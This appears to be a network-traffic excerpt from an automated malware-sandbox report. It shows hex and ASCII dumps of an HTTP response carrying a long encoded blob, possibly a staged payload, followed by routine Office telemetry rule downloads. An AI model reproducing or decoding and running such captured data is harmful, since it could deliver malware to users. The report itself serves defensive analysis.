                                                                                Data Ascii: n6wnOcpDN6ghOAkD/5gfO0nD85weOonDkzQyMgIDlyApM0JDcywmMgJDSygjMoIDGygQMYHDyxQcMAHDvxgbM0GDsxwaMoGDnxgZMUGDkxwYMIGDhxAYM8FDexgWMkFDYAAAAMCgBgDAAAoDV6AkO4oDJ6whOUoDD6ggOAkD75QeOQnDy5AcO4mDt5AbOsmDq5AaOcmDl5AYO4lDZ5wVOUlDT5gSOgkDG5QBO4jD24QNO4iDm4gHOYhDO4gxN4f
                                                                                2024-10-04 09:33:52 UTC1369INData Raw: 79 41 69 4d 63 49 44 47 79 51 68 4d 51 49 44 44 79 67 67 4d 45 49 44 41 41 41 41 41 41 43 67 42 41 42 77 4d 34 4d 44 4d 7a 67 79 4d 67 4d 44 47 7a 41 78 4d 49 4d 44 41 79 67 76 4d 77 4c 44 36 79 41 75 4d 59 4c 44 30 79 67 73 4d 41 4c 44 75 79 41 72 4d 6f 4b 44 6f 79 67 70 4d 51 4b 44 69 79 41 6f 4d 34 4a 44 63 79 67 6d 4d 67 4a 44 57 79 41 6c 4d 49 4a 44 51 79 67 6a 4d 77 49 44 4b 79 41 69 4d 59 49 44 45 79 67 67 4d 41 45 44 2b 78 41 66 4d 6f 48 44 34 78 67 64 4d 51 48 44 79 78 41 63 4d 34 47 44 73 78 67 61 4d 67 47 44 6d 78 41 5a 4d 49 47 44 67 78 67 58 4d 77 46 44 61 78 41 57 4d 59 46 44 55 78 67 55 4d 41 46 44 4f 78 41 54 4d 6f 45 44 49 78 67 52 4d 51 45 44 43 78 41 41 4d 34 44 44 38 77 67 4f 4d 67 44 44 32 77 41 4e 4d 49 44 44 77 77 67 4c 4d 77 43 44
                                                                                Data Ascii: yAiMcIDGyQhMQIDDyggMEIDAAAAAACgBABwM4MDMzgyMgMDGzAxMIMDAygvMwLD6yAuMYLD0ygsMALDuyArMoKDoygpMQKDiyAoM4JDcygmMgJDWyAlMIJDQygjMwIDKyAiMYIDEyggMAED+xAfMoHD4xgdMQHDyxAcM4GDsxgaMgGDmxAZMIGDgxgXMwFDaxAWMYFDUxgUMAFDOxATMoEDIxgRMQEDCxAAM4DD8wgOMgDD2wANMIDDwwgLMwCD
                                                                                2024-10-04 09:33:52 UTC1369INData Raw: 41 6e 4d 6b 4a 44 57 79 77 6b 4d 41 4a 44 4e 79 67 69 4d 63 49 44 45 79 51 51 4d 34 48 44 37 78 41 65 4d 51 48 44 78 78 67 62 4d 73 47 44 6f 78 51 5a 4d 49 47 44 66 78 41 58 4d 6b 46 44 57 78 77 55 4d 41 46 44 4e 78 67 53 4d 63 45 44 45 78 51 41 4d 34 44 44 37 77 41 4f 4d 55 44 44 79 77 77 4c 4d 77 43 44 70 77 67 4a 4d 4d 43 44 67 77 51 48 4d 6f 42 44 58 77 41 46 4d 45 42 44 4f 77 77 43 4d 67 41 44 46 77 67 41 41 41 4d 41 67 41 55 41 30 41 38 44 2f 2f 41 2f 50 6b 2f 44 32 2f 77 38 50 41 2f 44 74 2f 67 36 50 63 2b 44 6b 2f 51 34 50 34 39 44 62 2f 41 32 50 55 39 44 53 2f 77 7a 50 77 38 44 4a 2f 67 78 50 4d 38 44 41 2b 51 76 50 6f 37 44 33 2b 41 64 4e 6b 56 44 59 31 77 56 4e 59 4e 6a 39 7a 49 2f 4d 75 50 6a 36 41 41 41 41 4d 42 51 42 41 44 41 41 41 77 44 62
                                                                                Data Ascii: AnMkJDWywkMAJDNygiMcIDEyQQM4HD7xAeMQHDxxgbMsGDoxQZMIGDfxAXMkFDWxwUMAFDNxgSMcEDExQAM4DD7wAOMUDDywwLMwCDpwgJMMCDgwQHMoBDXwAFMEBDOwwCMgADFwgAAAMAgAUA0A8D//A/Pk/D2/w8PA/Dt/g6Pc+Dk/Q4P49Db/A2PU9DS/wzPw8DJ/gxPM8DA+QvPo7D3+AdNkVDY1wVNYNj9zI/MuPj6AAAAMBQBADAAAwDb
                                                                                2024-10-04 09:33:52 UTC1369INData Raw: 4e 4d 49 44 44 77 77 67 4c 4d 77 43 44 71 77 41 4b 4d 59 43 44 6b 77 67 49 4d 41 43 44 65 77 41 48 4d 6f 42 44 59 77 67 46 4d 51 42 44 53 77 41 45 4d 34 41 44 4d 77 67 43 4d 67 41 44 47 77 41 42 4d 49 41 44 41 41 41 51 41 6f 42 51 42 41 43 77 50 34 2f 44 38 2f 67 2b 50 67 2f 44 32 2f 41 39 50 49 2f 44 77 2f 67 37 50 77 2b 44 71 2f 41 36 50 59 2b 44 6b 2f 67 34 50 41 2b 44 65 2f 41 33 50 6f 39 44 59 2f 67 31 50 51 39 44 53 2f 41 30 50 34 38 44 4d 2f 67 79 50 67 38 44 47 2f 41 78 50 49 38 44 41 2b 67 76 50 77 37 44 36 2b 41 75 50 59 37 44 30 2b 67 73 50 41 37 44 75 2b 41 72 50 6f 36 44 6f 2b 67 70 50 51 36 44 69 2b 41 6f 50 34 35 44 63 2b 67 6d 50 67 35 44 57 2b 51 6c 50 4d 35 44 52 2b 77 6a 50 30 34 44 4c 2b 51 69 50 63 34 44 46 2b 77 67 50 45 30 44 2f 39
                                                                                Data Ascii: NMIDDwwgLMwCDqwAKMYCDkwgIMACDewAHMoBDYwgFMQBDSwAEM4ADMwgCMgADGwABMIADAAAQAoBQBACwP4/D8/g+Pg/D2/A9PI/Dw/g7Pw+Dq/A6PY+Dk/g4PA+De/A3Po9DY/g1PQ9DS/A0P48DM/gyPg8DG/AxPI8DA+gvPw7D6+AuPY7D0+gsPA7Du+ArPo6Do+gpPQ6Di+AoP45Dc+gmPg5DW+QlPM5DR+wjP04DL+QiPc4DF+wgPE0D/9
                                                                                2024-10-04 09:33:52 UTC1369INData Raw: 4e 59 56 44 56 31 41 56 4e 4d 56 44 53 31 51 55 4e 41 56 44 50 31 67 54 4e 30 55 44 4d 31 77 53 4e 6f 55 44 4a 31 41 53 4e 63 55 44 47 31 51 52 4e 51 55 44 44 31 67 51 4e 45 55 44 41 30 77 50 4e 34 54 44 39 30 41 50 4e 73 54 44 36 30 51 4f 4e 67 54 44 33 30 67 4e 4e 55 54 44 30 30 77 4d 4e 49 54 44 78 30 41 4d 4e 38 53 44 75 30 51 4c 4e 73 43 41 41 42 51 49 41 46 41 47 41 7a 49 30 4d 34 4d 6a 4c 7a 51 79 4d 61 4d 44 45 7a 59 67 4d 38 4c 6a 38 79 67 75 4d 65 4c 44 31 79 6f 73 4d 41 4c 6a 74 79 77 71 4d 69 4b 44 6d 79 34 6f 4d 45 4b 6a 65 79 41 6e 4d 6d 4a 44 58 79 49 6c 4d 49 4a 54 4f 79 38 69 4d 6c 49 7a 47 79 45 68 4d 48 45 54 2f 78 4d 66 4d 70 48 7a 33 78 55 64 4d 4c 48 54 77 78 63 62 4d 74 47 54 6d 78 38 59 4d 46 47 54 65 78 34 57 4d 6b 46 6a 57 78 41
                                                                                Data Ascii: NYVDV1AVNMVDS1QUNAVDP1gTN0UDM1wSNoUDJ1ASNcUDG1QRNQUDD1gQNEUDA0wPN4TD90APNsTD60QONgTD30gNNUTD00wMNITDx0AMN8SDu0QLNsCAABQIAFAGAzI0M4MjLzQyMaMDEzYgM8Lj8yguMeLD1yosMALjtywqMiKDmy4oMEKjeyAnMmJDXyIlMIJTOy8iMlIzGyEhMHET/xMfMpHz3xUdMLHTwxcbMtGTmx8YMFGTex4WMkFjWxA
                                                                                2024-10-04 09:33:52 UTC1061INData Raw: 62 63 54 75 33 41 67 4e 34 62 6a 36 32 6b 74 4e 4d 62 54 77 32 45 6f 4e 73 5a 44 57 32 77 6b 4e 44 55 7a 77 31 41 62 4e 4f 57 44 61 31 55 45 4e 38 54 7a 39 30 45 50 4e 73 54 6a 75 30 38 47 4e 49 52 44 46 7a 49 34 4d 76 4e 54 4f 7a 49 67 4d 4e 4c 44 78 79 59 72 4d 68 4b 54 63 79 6f 6c 4d 50 4a 7a 4f 79 41 6a 4d 72 49 6a 43 78 30 4e 41 41 41 41 6f 41 51 41 77 41 38 7a 79 2f 41 37 50 34 39 44 49 2f 41 78 50 47 34 54 2b 2b 38 75 50 67 37 6a 78 2b 38 72 50 34 36 54 73 2b 34 6e 50 70 35 44 5a 2b 4d 6c 50 4a 35 7a 4b 2b 38 51 50 39 33 7a 36 39 77 64 50 69 78 54 57 38 49 7a 4f 48 76 44 6f 36 73 50 4f 79 67 7a 45 33 55 36 4e 4b 5a 54 36 32 30 68 4e 51 59 44 43 31 73 4e 4e 6c 53 6a 59 30 45 45 4e 35 51 54 49 30 30 77 4d 41 4e 54 45 79 45 71 4d 57 4a 6a 54 78 49 64
                                                                                Data Ascii: bcTu3AgN4bj62ktNMbTw2EoNsZDW2wkNDUzw1AbNOWDa1UEN8Tz90EPNsTju08GNIRDFzI4MvNTOzIgMNLDxyYrMhKTcyolMPJzOyAjMrIjCx0NAAAAoAQAwA8zy/A7P49DI/AxPG4T++8uPg7jx+8rP46Ts+4nPp5DZ+MlPJ5zK+8QP93z69wdPixTW8IzOHvDo6sPOygzE3U6NKZT620hNQYDC1sNNlSjY0EEN5QTI00wMANTEyEqMWJjTxId
                                                                                2024-10-04 09:33:52 UTC1369INData Raw: 34 30 30 30 0d 0a 53 32 49 6b 4e 39 59 44 47 32 38 51 4e 72 58 7a 34 31 51 61 4e 63 57 7a 57 31 41 46 4e 39 54 7a 39 30 41 4a 4e 49 53 6a 65 30 49 48 4e 70 52 44 59 30 67 46 4e 51 52 44 53 30 30 44 4e 72 51 7a 49 30 63 42 4e 50 51 6a 42 7a 30 2f 4d 31 50 54 37 7a 55 2b 4d 64 50 44 30 7a 51 38 4d 38 4f 6a 66 7a 49 31 4d 6d 49 7a 2f 79 6b 76 4d 7a 4c 54 37 79 55 75 4d 68 4c 6a 31 79 63 73 4d 37 4b 6a 71 79 34 70 4d 4d 4b 44 61 79 6b 6c 4d 4c 4a 54 4b 79 51 69 4d 66 49 7a 43 79 41 51 4d 72 48 6a 33 78 4d 64 4d 6b 47 6a 68 78 45 59 4d 38 46 54 63 78 55 56 4d 78 41 6a 2f 77 6b 50 4d 30 44 54 36 77 67 4c 4d 55 43 7a 6a 77 6f 49 4d 2f 42 7a 59 77 77 45 4d 78 41 44 4c 77 63 43 4d 63 41 44 41 41 41 51 41 45 41 41 42 67 42 77 50 77 2f 7a 7a 2f 6f 38 50 46 2f 6a 75
                                                                                Data Ascii: 4000S2IkN9YDG28QNrXz41QaNcWzW1AFN9Tz90AJNISje0IHNpRDY0gFNQRDS00DNrQzI0cBNPQjBz0/M1PT7zU+MdPD0zQ8M8OjfzI1MmIz/ykvMzLT7yUuMhLj1ycsM7Kjqy4pMMKDayklMLJTKyQiMfIzCyAQMrHj3xMdMkGjhxEYM8FTcxUVMxAj/wkPM0DT6wgLMUCzjwoIM/BzYwwEMxADLwcCMcADAAAQAEAABgBwPw/zz/o8PF/ju
                                                                                2024-10-04 09:33:52 UTC1369INData Raw: 37 4f 63 70 6a 30 36 67 6f 4f 7a 70 54 47 35 59 4d 4f 35 65 7a 32 33 67 37 4e 49 61 7a 64 41 41 41 41 6f 41 77 41 77 44 41 41 41 38 54 34 37 6b 6b 4f 69 6d 6a 73 35 77 59 4f 76 68 54 75 34 30 4a 4f 45 68 6a 4b 78 73 65 4d 49 47 6a 4e 78 49 54 4d 75 45 6a 4b 78 59 53 4d 69 45 6a 48 78 6f 52 4d 57 45 6a 45 78 34 51 4d 4b 41 6a 37 41 41 41 41 38 41 77 41 67 44 67 50 7a 4d 54 49 7a 30 78 4d 5a 4d 54 46 7a 45 78 4d 4e 4d 54 43 7a 55 67 4d 35 4a 54 41 78 30 66 4d 35 48 54 39 78 45 66 4d 74 48 54 36 78 55 65 4d 63 42 54 35 77 45 4f 4d 64 44 54 32 77 55 4e 4d 52 44 54 7a 77 6b 4d 4d 30 41 41 41 41 41 45 41 44 41 4e 41 2f 30 37 50 35 2b 54 74 2f 45 37 50 74 2b 54 71 2f 55 36 50 68 2b 44 47 39 51 59 50 79 31 44 55 39 73 54 50 62 30 54 43 37 77 65 4e 72 4e 7a 37 79
                                                                                Data Ascii: 7Ocpj06goOzpTG5YMO5ez23g7NIazdAAAAoAwAwDAAA8T47kkOimjs5wYOvhTu40JOEhjKxseMIGjNxITMuEjKxYSMiEjHxoRMWEjEx4QMKAj7AAAA8AwAgDgPzMTIz0xMZMTFzExMNMTCzUgM5JTAx0fM5HT9xEfMtHT6xUeMcBT5wEOMdDT2wUNMRDTzwkMM0AAAAAEADANA/07P5+Tt/E7Pt+Tq/U6Ph+DG9QYPy1DU9sTPb0TC7weNrNz7y
                                                                                2024-10-04 09:33:52 UTC1369INData Raw: 50 69 32 44 6e 39 63 5a 50 52 32 7a 69 39 55 59 50 41 32 6a 65 39 4d 58 50 75 31 54 61 39 4d 57 50 64 31 7a 56 39 49 56 50 4d 31 6a 52 39 41 55 50 37 30 54 4e 39 38 53 50 70 30 44 4a 39 34 52 50 59 30 6a 45 39 30 51 50 48 30 54 41 38 73 50 50 32 7a 44 38 38 6f 4f 50 6b 7a 7a 33 38 6b 4e 50 54 7a 54 7a 38 67 4d 50 43 7a 44 76 38 59 4c 50 78 79 7a 71 38 55 4b 50 66 79 6a 6d 38 51 4a 50 4f 79 44 69 38 4d 49 50 39 78 7a 64 38 45 48 50 73 78 6a 5a 38 41 47 50 61 78 54 56 38 38 45 50 4a 78 7a 51 38 34 44 50 34 77 6a 4d 38 77 43 50 6e 77 54 49 38 6f 42 50 54 77 54 44 37 67 71 4f 42 72 54 4e 35 45 66 4f 6b 6e 54 33 35 63 64 4f 52 6e 44 77 35 4d 61 4f 4f 6d 44 69 35 41 59 4f 72 6c 6a 58 35 49 56 4f 45 6c 7a 48 32 30 71 4e 6d 61 6a 6d 32 49 6f 4e 4b 55 6a 2f 31 6b
                                                                                Data Ascii: Pi2Dn9cZPR2zi9UYPA2je9MXPu1Ta9MWPd1zV9IVPM1jR9AUP70TN98SPp0DJ94RPY0jE90QPH0TA8sPP2zD88oOPkzz38kNPTzTz8gMPCzDv8YLPxyzq8UKPfyjm8QJPOyDi8MIP9xzd8EHPsxjZ8AGPaxTV88EPJxzQ84DP4wjM8wCPnwTI8oBPTwTD7gqOBrTN5EfOknT35cdORnDw5MaOOmDi5AYOrljX5IVOElzH20qNmajm2IoNKUj/1k


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                9192.168.2.54972113.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:33:52 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:52 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:52 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 474
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                                ETag: "0x8DC582B9964B277"
                                                                                x-ms-request-id: aa8826a4-b01e-0053-608c-15cdf8000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093352Z-15767c5fc552g4w83buhsr3htc0000000c8000000000a66g
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:52 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                10192.168.2.54971913.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:33:52 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:52 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:52 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 415
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                                ETag: "0x8DC582B9F6F3512"
                                                                                x-ms-request-id: 757ce4f4-401e-000a-128c-154a7b000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093352Z-15767c5fc55rv8zjq9dg0musxg0000000cag000000005myu
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:52 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                11192.168.2.54972013.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:33:52 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:52 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:52 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 471
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                                ETag: "0x8DC582BB10C598B"
                                                                                x-ms-request-id: 24b39cfc-301e-0096-2a8c-15e71d000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093352Z-15767c5fc55rv8zjq9dg0musxg0000000c90000000008dzh
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:52 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                12192.168.2.54972313.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:33:52 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:52 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:52 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 632
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                ETag: "0x8DC582BB6E3779E"
                                                                                x-ms-request-id: 3a0dc1eb-601e-0032-608c-15eebb000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093352Z-15767c5fc55n4msds84xh4z67w00000005xg00000000ae9r
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:52 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                13192.168.2.54972213.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:33:52 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:52 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:52 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 467
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                ETag: "0x8DC582BA6C038BC"
                                                                                x-ms-request-id: b2393cc3-501e-005b-768c-15d7f7000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093352Z-15767c5fc55whfstvfw43u8fp40000000cdg000000007t85
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:52 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                14192.168.2.54972513.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:33:52 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:53 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:52 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 407
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                ETag: "0x8DC582BBAD04B7B"
                                                                                x-ms-request-id: 023e3708-a01e-003d-568c-1598d7000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093352Z-15767c5fc55qdcd62bsn50hd6s0000000c0000000000bn6b
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
